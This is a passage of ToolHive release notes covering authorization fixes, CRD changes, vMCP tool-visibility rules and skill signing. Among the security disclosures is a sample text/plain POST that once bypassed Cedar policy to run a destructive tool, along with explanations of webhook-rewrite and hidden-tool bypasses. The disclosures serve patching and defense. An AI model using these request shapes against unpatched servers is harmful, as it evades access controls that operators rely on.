checks, instead of serving the registration-time snapshot until reconnect — note that tools can now also disappear mid-session, since resync uses replace semantics (#6196)operational.timeouts for backend calls, and no longer tears down a slow POST at the 30 s server write deadline (#6411)http://localhost/callback registration listening on an ephemeral port was rejected as a redirect_uri mismatch, and OAuth errors now reach the client's real listener (#6215)thv llm setup, instead of an opaque invalid_grant that every consumer read as a transient provider fault and retried forever (#6389)insecureAllowConfidentialOverLoopbackHTTP is explicitly enabled, unblocking local development; non-loopback HTTP issuers remain rejected (#6426)CreateExclusive's exists-check and creation are no longer racy (#6350)kubectl rollout restart on ToolHive proxy Deployments and MCPServer workload StatefulSets is honoured instead of being reverted on the next reconcile (#6378)Ready is no longer claimed on a proxy-only stack serving a dead backend (#6379)unix:// socket URLs round-trip correctly on Windows — POSIX paths no longer gain a fourth slash, and drive-letter paths parse instead of being rejected as not absolute (#6416)thv skill sync and thv skill upgrade re-read each skill under its lock before classifying or mutating, so a concurrent uninstall is not resurrected and a newer install is not overwritten (#6352)runtime_config fields instead of silently dropping build_with and runtime_env (#6214)/metrics endpoint move is diagnosable: the dead endpoint returns an explanatory 404 body and the startup line is a WARN naming the resolved diagnostics address (#6369)metricsOnTransportPort, defaulting to on, so no existing scrape configuration breaks on upgrade (#6370)toolhive-core's container/signer, deleting the local duplicate that only ever supported key-pair signing (#6383)close of closed channel panic in the vMCP backend session tests that aborted the whole test binary and surfaced as unrelated failures (#6363)task test-e2e runs sweep workloads leaked by a Ginkgo timeout-kill, which had been exhausting the Docker network address pool (#6367)Accept: application/json, text/event-stream header (#6123)golangci-lint to v2.12.2 to avoid an upstream nilness analyzer panic that was failing CI on main (#6393)GO-2026-5932 openpgp suppression now names a checkable removal trigger and records why the dependency cannot be fixed locally (#6286)| Module | Version |
|---|---|
github.com/moby/go-archive |
v0.3.0 |
github.com/stacklok/toolhive-catalog |
v0.20260824.0 |
anthropics/claude-code-action |
v1.0.205 |
Also bumped as part of feature work: github.com/stacklok/toolhive-core to v0.0.41 (#6383) and v0.0.42 (#6420) — the latter migrated cel to the renamed cel.dev/cel-go module.
👋 Welcome to our newest contributors: @TANTIOPE, @haaaashimi, @RaviTharuma, @premctl, @melbinjp, @christensenjairus, @talshechanovitz 🎉
Full commit logNote truncated.
Nothing published for this version
Nothing published for this version
Nothing published for this version
Push skills unsigned until keyless signing lands by @samuv in #6334
Full Changelog: v0.43.0...v0.44.0
Nothing published for this version
Guard against shell injection via github.ref in image workflow by @ChrisJBurns in #6248
Full Changelog: v0.42.1...v0.43.0
Nothing published for this version
github.com/go-git/go-git/v5 v5.19.2 (fixes CVE-2026-71556 — worktree operations may follow symlinks)
A security-hardening patch release: three authorization gaps are closed (non-JSON POSTs bypassing Cedar, filtered vMCP tools staying callable, and unvalidated OIDC issuer URLs), alongside a deny-by-default visibility model for vMCP tool aggregation and a fail-closed consent model for external OIDC subject tokens.
POST requests are now rejected instead of skipping authorization — with Cedar authorization enabled, a POST without Content-Type: application/json (including a missing header) returns 400 rather than being forwarded unauthorized; set the header on all MCP POSTs (migration guide)tools/list are no longer directly callable — a tool excluded via filter / excludeAll / excludeAllTools now returns -32602 on the Modern (2026-07-28) path instead of executing; un-filter it or reach it through a composite tool (migration guide)MCPOIDCConfig inline issuer and JWKS URLs are now validated — stored inline configs with a malformed or plain-HTTP URL flip to Valid=False on their next reconcile and block reconciliation of every workload referencing them; add insecureAllowHTTP: true or switch to HTTPS (migration guide)Who is affected: only deployments that configure Cedar authorization (--authz-config, or authzConfig in the CRD). Deployments without an authorization config are entirely unaffected.
Previously, shouldSkipInitialAuthorization skipped Cedar evaluation for any POST whose Content-Type was not application/json — but skipping authorization did not stop the request. The proxy forwarded the body verbatim and MCP backends parse JSON-RPC without checking Content-Type, so a tools/call smuggled under text/plain executed with no policy evaluation at all. Such requests now fall through to the parsed-request check and are refused.
POST /mcp HTTP/1.1
Content-Type: text/plain
{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"delete_repo"}}→ forwarded to the backend and executed, with no Cedar evaluation.
POST /mcp HTTP/1.1
Content-Type: application/json
{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"delete_repo"}}→ parsed and evaluated against your Cedar policies. The text/plain form now returns 400 Invalid or malformed MCP request.
curl invocation sends Content-Type: application/json on POST requests. A missing Content-Type header is also now rejected. Spec-conformant MCP Streamable HTTP clients already comply.Application/JSON and application/json; charset=utf-8 are accepted. Near-miss types that previously prefix-matched — application/json-rpc, application/jsonx — are not.denied events, since these refusals are now audited as denials rather than generic failures.PR: #6234
Migration guide: hidden vMCP tools are no longer directly callableWho is affected: vMCP operators using aggregation.tools filter, per-workload excludeAll, or global excludeAllTools, whose clients speak the Modern (2026-07-28) revision.
Tool filtering was enforced on the Legacy path (which registers one handler per advertised tool) but not on the Modern one, which is stateless and resolved tools/call straight against the routing table — and the routing table deliberately holds every backend tool so composite workflow steps can reach them. A Modern client that knew a filtered tool's name could call it successfully. core.CallTool now resolves against the advertised view, so filtering holds identically on both revisions.
aggregation:
tools:
- workload: github
filter: ["get_issue"] # create_issue hidden from tools/list// Modern client, tools/call { "name": "github_create_issue" }
// → JSON-RPC error -32602, HTTP 400; the backend is never invokedTo keep a tool reachable while hidden from tools/list, wrap it in a composite tool:
compositeTools:
- name: file_issue
steps:
- id: create
type: tool
tool: github.create_issue # workflow steps still reach hidden toolsfilter / drop excludeAll for that workload so it appears in tools/list — advertised now means callable, and only advertised is callable.{workloadID}.{toolName} alias, switch to the exact conflict-resolved name shown in tools/list (e.g. github_create_issue). The dotted alias remains valid inside composite workflow step definitions — only direct tools/call rejects it.tools/call for an unknown or hidden tool now answers -32602 at HTTP 400 (previously -32603 at HTTP 200), matching the MCP specification's "Unknown tool" protocol error. Clients should inspect the JSON-RPC body and treat this as a call-level error, not a connection failure.Who is affected: clusters with MCPOIDCConfig resources of spec.type: inline whose issuer or jwksUrl is plain HTTP, malformed, missing a scheme or host, or uses a non-HTTP(S) scheme. In practice this is dev/test clusters pointing at an in-cluster Keycloak or Dex over HTTP; production HTTPS setups are unaffected. kubernetesServiceAccount configs are explicitly skipped.
Validation runs at reconcile time, not at admission — so it applies to already-stored objects, not just new applies. A failing config gets Valid=False, and every MCPServer, MCPRemoteProxy, and VirtualMCPServer referencing it gets OIDCConfigRefValidated=False and stops reconciling. Already-running pods keep serving, so a stalled workload can look healthy while silently ignoring spec changes, image updates, and rollouts.
apiVersion: toolhive.stacklok.dev/v1beta1
kind: MCPOIDCConfig
metadata:
name: keycloak-auth
spec:
type: inline
inline:
issuer: http://keycloak:8080/realms/toolhive
jwksUrl: http://keycloak:8080/realms/toolhive/protocol/openid-connect/certs# Production — switch to HTTPS
spec:
type: inline
inline:
issuer: https://keycloak.example.com/realms/toolhive
jwksUrl: https://keycloak.example.com/realms/toolhive/protocol/openid-connect/certs
# Dev/test only — opt in explicitly; one flag now covers both URLs
spec:
type: inline
inline:
issuer: http://keycloak:8080/realms/toolhive
jwksUrl: http://keycloak:8080/realms/toolhive/protocol/openid-connect/certs
insecureAllowHTTP: truekubectl get mcpoidcconfigs -A -o jsonpath='{range .items[?(@.spec.type=="inline")]}{.metadata.namespace}{"/"}{.metadata.name}{"\t"}{.spec.inline.issuer}{"\t"}{.spec.inline.jwksUrl}{"\n"}{end}'issuer or jwksUrl is http://, has no scheme, or is otherwise malformed. An empty jwksUrl is fine — it falls back to discovery.https://. For dev/test only, add insecureAllowHTTP: true under spec.inline.kubectl get mcpoidcconfig <name> -o jsonpath='{.status.conditions[?(@.type=="Valid")]}'. The failure message names the offending URL.OIDCConfigRefValidated on the referencing MCPServer / MCPRemoteProxy / VirtualMCPServer.pkg/container/images.NewCompositeKeychain deprecated in favour of github.com/stacklok/toolhive-core/container/images.NewCompositeKeychain — the local function is now a thin wrapper with identical behaviour and will be removed in a future cleanup wave; Go module consumers only, no CLI or CRD surface (#6147)aggregation.defaultToolVisibility: deny so that only workloads explicitly listed in aggregation.tools have their tools advertised, closing the fail-open gap where adding a workload to a group silently exposed it (#6163)readOnlyHint, destructiveHint, idempotentHint, openWorldHint), with a conservative fail-closed safety floor derived from the workflow's step tools when none are set explicitly (#6208)trusted_issuers, letting agents exchange subject tokens minted by an external OIDC issuer (Entra, Okta, Keycloak) for ToolHive-scoped delegated tokens under a fail-closed RFC 8693 consent policy (#6149)TOOLHIVE_API_TIMEOUT overrides the CLI's API client timeout for thv skill and thv ai-plugin, for anyone who wants to fail faster than the new 10-minute default (#6224, #6228)logging/setLevel RPC is no longer sent to backends that negotiate MCP 2026-07-28, where the rejection was fatal and closed the session while health checks stayed green (#6184)initialize latency for an entire server: new sessions skip backends the health monitor has classified unhealthy or unauthenticated, while degraded backends are still attempted and restored sessions are unchanged (#6162)thv llm proxy now completes when the calling client times out mid-login — the callback listener is rooted in the proxy's lifetime rather than the inbound request's, which is the normal case for thv llm setup --lazy (#6229)ErrNotReady and ErrResourceAlreadyExists are treated as registered, so validation self-heals once a background fetch succeeds (#6221)jwx bump from silently bypassing custom CA bundles and private-IP policy on every JWKS fetch (#6220)thv skill upgrade no longer requires --allow-ref-change for a version change within the same repository; the flag now means "permit the artifact to move to a different repository, org, or registry", and same-repository tag moves — including moves to an older tag — proceed unprompted, with digest pinning and the signer-change guard unchanged (#6225)thv skill commands accept a relative --project-root such as ., resolving it against the working directory instead of failing with project_root must be absolute (#6223)thv ai-plugin commands accept a relative --project-root the same way, matching thv skill (#6226)defaultToolVisibility CRD reference no longer carries maintainer-internal defaulting rationale, and an unreachable nil-check was removed from the deny-visibility validator (#6233)pkg/container/images keychain logic is delegated to toolhive-core v0.0.37, with the local file reduced to a deprecated wrapper (#6147)| Module | Version |
|---|---|
github.com/go-git/go-git/v5 |
v5.19.2 (fixes CVE-2026-71556 — worktree operations may follow symlinks) |
aggregation.defaultToolVisibility requires the v0.42.1 CRDs. The aggregation subtree does not preserve unknown fields, so on a cluster running the new operator against old CRDs the field is pruned at admission and aggregation silently falls back to allow — every workload in the group has its tools advertised. Verify with kubectl get virtualmcpserver <name> -o jsonpath='{.spec.config.aggregation.defaultToolVisibility}'.defaultToolVisibility gates tools only. Resources, resource templates, and prompts from unlisted backends are still advertised.annotations is not set, a conservative floor is derived from the workflow's step tools; because most backends declare no annotations today, composite tools typically now advertise destructiveHint: true / openWorldHint: true. These match the MCP specification's defaults for absent annotations, but clients that key off explicit hints may begin prompting for confirmation on composite tools that previously carried none. A contradictory explicit annotation causes the tool to be dropped at advertise time with a warning — this is detected at runtime, not by thv vmcp validate or the operator.👋 Welcome to our newest contributors: @lopster568, @SashaMIT 🎉
Full commit logFull Changelog: v0.42.0...v0.42.1
🔗 Full changelog: v0.42.0...v0.42.1
AI-tool plugin management goes end to end — thv ai-plugin gains a full CLI, REST API, and registry catalog — and the skills supply chain gets Sigstore
AI-tool plugin management goes end to end — thv ai-plugin gains a full CLI, REST API, and registry catalog — and the skills supply chain gets Sigstore signature verification at install, sync, and upgrade time. Alongside that, a large batch of MCP dual-era correctness fixes lands: multiple clients can finally share a stdio server, and vMCP stops flapping between the Modern and Legacy revisions.
status.referencingWorkloads and status.referenceCount (and the References printer column) are gone from all six config CRDs; replace any automation reading them with a workload field query (migration guide)pkg/telemetry/providers was deleted and two long-published optimizerdec constants were removed (migration guide)Who is affected: anyone reading status.referencingWorkloads or status.referenceCount from MCPOIDCConfig, MCPAuthzConfig, MCPExternalAuthConfig, MCPToolConfig, MCPWebhookConfig, or MCPTelemetryConfig — kubectl users relying on the REFERENCES column, scripts and GitOps assertions using jsonpath/jq on those paths, Chainsaw/kuttl tests, kube-state-metrics custom-resource-state configs and the dashboards built on them, and Go code reading .Status.ReferencingWorkloads / .Status.ReferenceCount.
MCPWebhookConfig and MCPTelemetryConfig only ever had referencingWorkloads. MCPTelemetryConfig never had a References printer column, so its kubectl get output is unchanged.
Upgrade safety: these were derived values computed from workload specs — the source of truth (spec.*ConfigRef on workloads) is untouched, so nothing unrecoverable is lost. Applying the new schema does not rewrite or reject existing stored objects; residual values stay inert in etcd until each object's status is next written. No storage-version bump, no CRD delete/recreate, no migration job. Deletion protection is unchanged — every config controller still recomputes referrers live at deletion time and sets DeletionBlocked=True with reason ReferencedByWorkloads.
$ kubectl -n toolhive-system get mcpoidcconfig
NAME SOURCE VALID REFERENCES AGE
my-oidc inline True 3 5d$ kubectl -n toolhive-system get mcpoidcconfig
NAME SOURCE VALID AGE
my-oidc inline True 5dTo list referrers, query the workloads by their config-ref:
kubectl -n toolhive-system get mcpservers,mcpremoteproxies,virtualmcpservers -o json \
| jq -r --arg n my-oidc '.items[]
| select((.spec.oidcConfigRef.name // .spec.incomingAuth.oidcConfigRef.name) == $n)
| "\(.kind)/\(.metadata.name)"'The reference paths per config kind, exactly as the operator's own indexers define them:
| Config kind | Workload kinds tracked | Spec paths |
|---|---|---|
MCPOIDCConfig |
MCPServer, MCPRemoteProxy, VirtualMCPServer | spec.oidcConfigRef.name; spec.incomingAuth.oidcConfigRef.name (vMCP) |
MCPAuthzConfig |
MCPServer, MCPRemoteProxy, VirtualMCPServer | spec.authzConfigRef.name; spec.incomingAuth.authzConfigRef.name (vMCP) |
MCPTelemetryConfig |
MCPServer, MCPRemoteProxy, VirtualMCPServer | spec.telemetryConfigRef.name |
MCPExternalAuthConfig |
MCPServer, MCPRemoteProxy | spec.externalAuthConfigRef.name, or spec.authServerRef.name when spec.authServerRef.kind == "MCPExternalAuthConfig" |
MCPToolConfig |
MCPServer | spec.toolConfigRef.name |
MCPWebhookConfig |
MCPServer | spec.webhookConfigRef.name |
Note kubectl --field-selector will not work for these paths — the operator's indexes are controller-runtime cache indexes, not API-server field selectors. Use -o json | jq or -o custom-columns.
kubectl get mcpoidcconfigs,mcpauthzconfigs,mcpexternalauthconfigs,mcptoolconfigs,mcpwebhookconfigs,mcptelemetryconfigs -A -o json > /tmp/thv-config-refs-pre-0.42.jsonreferenceCount, referencingWorkloads, and the References/REFERENCES column — shell scripts, kubectl wait --for=jsonpath=, Chainsaw/kuttl assertions, Argo CD/Flux health checks, kube-state-metrics configs, Grafana panels, Kyverno/Gatekeeper rules.kubectl -n NS get mcpoidcconfig my-oidc -o jsonpath='{.status.conditions[?(@.type=="DeletionBlocked")].message}'helm upgrade the operator-crds chart, then the operator chart. No pre/post hooks needed.kubectl -n toolhive-system get mcpoidcconfig shows NAME SOURCE VALID AGE, and deletion of a referenced config still leaves it with DeletionBlocked=True..Status.ReferencingWorkloads / .Status.ReferenceCount reads. The WorkloadReference type (Kind, Name) is still exported if you want to keep your own list shape.PR: #5631 — completes the cleanup tracked in #5607
Migration guide: Cedar policy now sees the post-mutation requestWho is affected: only workloads configured with at least one mutating webhook and either Cedar authorization or any consumer of audit / telemetry / usage metrics. Both are shipped, supported, non-mutually-exclusive configurations — thv run --webhook-config <file with a mutating: entry> --authz-config <file>, or MCPWebhookConfig.spec.mutating in the operator. Workloads with no mutating webhook see zero change; the republish is gated on the body actually having changed.
What was wrong: ParsingMiddleware parses the request body once and refuses to parse again. The mutating webhook replaced r.Body but passed the request through unchanged, so Cedar evaluated policy against the tool name and arguments that arrived while the backend executed the ones that ran. The audit half was reachable in the default configuration: the event type and target.name resolve through the parsed-request holder regardless of includeRequestData (which defaults to false), so the audit trail named a request that never executed. Telemetry and usage metrics drifted the same way.
Security framing, stated precisely: before v0.42.0, a client could reach a tool or argument set Cedar would have denied by sending a permitted request shape that the webhook rewrote into a forbidden one. A second bug narrowed this in practice: r.ContentLength was not refreshed alongside r.Body, so a mutation that shrank the body failed at the reverse proxy and one that grew it was truncated into invalid JSON. The bypass was live for length-preserving rewrites — which is exactly case/format normalization, and a webhook can pad JSON whitespace to hold length constant. That stale Content-Length is also fixed here.
client request ──► ParsingMiddleware ──► parse cached ──► mutating webhook rewrites body
│ │
Cedar reads ◄────────────────┘ (pre-mutation)
audit reads backend runs post-mutation
client request ──► ParsingMiddleware ──► parse cached ──► mutating webhook rewrites body
│
RepublishParsedMCPRequest (body changed)
│
Cedar reads ◄────────────────┘ (post-mutation)
audit reads backend runs post-mutation
--webhook-config with a mutating: entry (or MCPWebhookConfig.spec.mutating). If not, stop — no action needed.method, params.name, and/or params.arguments.MCP::Tool::"<name>") and every when { context.arg_* } clause. Policies that were passing only because they never saw the rewrite will now deny, and vice versa.type or target.name — for mutated requests those values change on upgrade.Gaps this deliberately does not close, all documented rather than fixed:
includeRequestData: true, the recorded request payload is still the pre-mutation body (audit reads r.Body before the webhook), so event type/target name are post-mutation while the payload is not.Mcp-Method/Mcp-Name headers forwarded to the backend still name the original tool. A conformant Modern backend rejects the mismatch, so it fails closed — but a mutating webhook should not rename tools on the Modern path.ParsingMiddleware and still decide against the request as received, so --tools filtering remains bypassable by a webhook rename. Tracked in #6134.This is an unintended regression, not a design decision. It is called out here because it costs you diagnostics silently, and a one-line fix is expected in a patch release.
Who is affected: any operator who relies on ToolHive's logs to diagnose a recovered HTTP panic — including log-based alerts, log-derived metrics, and support bundles. Everyone running without Sentry configured (the default) is affected most.
What changed: pkg/recovery became a thin shim over toolhive-core/recovery. Core's Middleware recovers panics silently unless a logger is injected via WithLogger, and ToolHive's shim passes only WithPanicHandler. The OTel span error recording and Sentry issue reporting are genuinely preserved — same span status (codes.Error, "panic recovered"), same sanitization, same raw value to Sentry, same ordering — but the slog.Error line and its stack trace are gone, and no other middleware picks them up.
time=... level=ERROR msg="Panic recovered: runtime error: index out of range [3] with length 2
Stack trace:
goroutine 42 [running]:
runtime/debug.Stack()
..."
(no log output — the client receives 500 Internal Server Error and nothing is recorded locally)
Panic recovered, they will stop firing. Do not interpret the silence as "no panics" — re-point them at the 500-response rate or at Sentry until the log line returns.ReportPanic still sends the raw panic value, so panics remain visible as Sentry Issues with full context.RecordError plus an error status, so OTel-based panic detection keeps working.msg="panic recovered" with panic, method, path, and stack attributes) rather than the old single formatted string, so write any new log parser against that shape.PR: #6145
Migration guide: Go API changesWho is affected: only out-of-tree Go code importing ToolHive packages. No CLI, REST API, or CRD surface changes here, and no in-tree caller is affected.
pkg/telemetry/providers was deleted (#6146)The package and its /otlp and /prometheus subpackages were removed and consumed from toolhive-core instead. The graduation is verbatim — every non-test file is byte-identical apart from two self-referential import paths — so all 12 options (WithServiceName, WithServiceVersion, WithOTLPEndpoint, WithHeaders, WithInsecure, WithCACertPath, WithTracingEnabled, WithMetricsEnabled, WithSamplingRate, WithEnablePrometheusMetricsPath, WithCustomAttributes, WithExtraSpanProcessors) plus NewCompositeProvider, ProviderOption, and CompositeProvider keep identical names and signatures. Nothing about emitted telemetry changes — resource attributes, service-name defaulting, OTLP exporter/TLS config, and Prometheus exporter registration all behave as before.
Before
import "github.com/stacklok/toolhive/pkg/telemetry/providers"After
import "github.com/stacklok/toolhive-core/telemetry/providers"optimizerdec constants were removed (#6175)pkg/vmcp/session/optimizerdec no longer exports CallToolArgToolName or CallToolArgParameters. Both have been part of the published API since v0.15.0. They existed to read the call_tool target out of a raw arguments map, a pattern that is now known-unsafe: encoding/json falls back to case-insensitive field matching, so a map index and a struct decode resolve different key sets.
Before
toolName, _ := args[optimizerdec.CallToolArgToolName].(string)
params, _ := args[optimizerdec.CallToolArgParameters].(map[string]any)After
// Decode with the same call both dispatch sites use, so key matching cannot diverge.
in, err := schema.Translate[optimizer.CallToolInput](args)registry.Provider gained three methods (#6135)ListAvailablePlugins(), GetPlugin(namespace, name), and SearchPlugins(query) were added to the interface. Implementations that embed registry.BaseProvider pick up no-op defaults and need no change; anything satisfying the old method set directly will no longer compile.
Migration: embed registry.BaseProvider in your provider struct, or implement the three methods.
pkg/audit's MCP event constants, LevelAudit, and NewAuditLogger are now transitional aliases for github.com/stacklok/toolhive-core/audit and will be removed once the migration's cleanup wave rewrites imports per subtree — prefer the toolhive-core/audit symbols in new code (#6148)thv ai-plugin command group — build, validate, push, install, list, info, uninstall, plus local build management via builds and builds remove — targeting Claude Code and Codex (#5782)/api/v1beta/plugins (10 endpoints) with a matching Go HTTP client in pkg/plugins/client, so the CLI, API, and external tooling share one contract (#5782)thv ai-plugin install <name> now resolves a plain name against the configured registry instead of failing with a 404 hint, and new catalog routes let you browse and search plugins in a registry (#6135)provenance: on first use and rejecting unsigned artifacts unless you pass --allow-unsigned (#6129)thv skill sync re-verifies each managed skill's stored Sigstore bundle offline against the lock file's recorded identity, treating a failed re-verification as drift so a CI gate catches signature changes exactly like content changes (#6131)thv skill upgrade refuses to move a skill to an artifact signed by a different identity — or to an unsigned one — reporting signer-change-blocked unless you explicitly rotate trust with --allow-signer-change (#6132)The skills signing features above are all behind the experimental TOOLHIVE_SKILLS_LOCK_ENABLED gate and apply only to project-scoped installs. With the gate unset, thv skill install behaves exactly as in v0.41.0. Note that git (gitsign) provenance is recorded as provisional: true because the embedded Rekor transparency-log proof is not yet validated — signing time is checked only against the Fulcio certificate's own ~10-minute validity window. OCI provenance is not provisional.
duplicate "initialize" received, which also unblocks vMCP aggregating stdio backends (#6153)initialize on a live connection behind the transparent proxy now receives a fresh session instead of a hard failure, because the proxy no longer forwards a session ID on initialize (#6152)github-mcp-server v1.6.0 no longer oscillate between the Modern and Legacy revisions and fail roughly half their health checks — a Modern promotion must now win a confirming server/discover probe rather than trusting the negotiated version alone (#6158)io.modelcontextprotocol/logLevel _meta key that replaced the removed logging/setLevel RPC (#6140)_meta (trace ids, custom fields) on resources/read results, matching what the Modern path already delivered (#6180)find_tool's tool_keywords input now actually affects results instead of being decoded and dropped, and it drives the lexical BM25 arm while tool_description drives semantic matching (#6124)call_tool now accepts the common LLM malformation where tool_name is nested inside parameters, and a genuinely missing tool_name produces an error that states the expected shape and lists the parameter names received (#6150)server.json under %LOCALAPPDATA% are now protected with an explicit DACL granting only the ToolHive user and SYSTEM, and are ownership-validated before being trusted — POSIX mode bits are advisory on NTFS, so any local account with Modify could previously rewrite the npipe:// discovery URL and redirect the next MCP client (#5951)call_tool target through the same decoder dispatch uses, closing three case-sensitivity divergences that could skip a policy check or drop arguments (#6175)pkg/telemetry/providers (~2,900 LOC) is deleted in favour of the verbatim graduation in toolhive-core, with no change to emitted telemetry (#6146)pkg/recovery becomes a thin shim over toolhive-core/recovery, keeping ToolHive's OTel and Sentry wiring through a panic-handler hook (#6145)toolhive-core's semconv preset instead of a local literal; the boundaries are unchanged (#6144)LevelAudit, and NewAuditLogger become aliases over toolhive-core/audit with byte-identical values, so the audit wire format is untouched (#6148)ida-pro-mcp e2e image by digest after an upstream rebuild pulled in the breaking mcp Python SDK 2.0.0, and added test/e2e/images/** to the lifecycle suite's trigger filter so an image change can no longer skip the tests that consume it (#6159)mcp-server-time e2e image by digest for the same upstream breakage, unblocking the proxy suites (#6160)timeout waiting for process kube-apiserver to stop flake — 32 of the job's last 51 failures — by awaiting manager shutdown before tearing down envtest (#6179)| Module | Version |
|---|---|
github.com/stacklok/toolhive-core |
v0.0.35 → v0.0.38 |
github.com/stacklok/toolhive-catalog |
v0.20260804.0 |
github.com/tailscale/hujson |
b80ff77 |
coverallsapp/github-action |
8d6379e |
github/codeql-action |
f205ea1 |
anthropics/claude-code-action |
v1.0.183 |
toolhive-core was bumped across #6144, #6146, and #6180 rather than by a dependency PR; v0.0.38 also carries transitive bumps to aws-sdk-go-v2, go-containerregistry, moby/client, prometheus, and otel.
👋 Welcome to our newest contributor: @Tanguille 🎉
Full commit logFull Changelog: v0.41.0...v0.42.0
🔗 Full changelog: v0.41.0...v0.42.0
Your coding agent can read these notes before it upgrades. Set up the MCP server →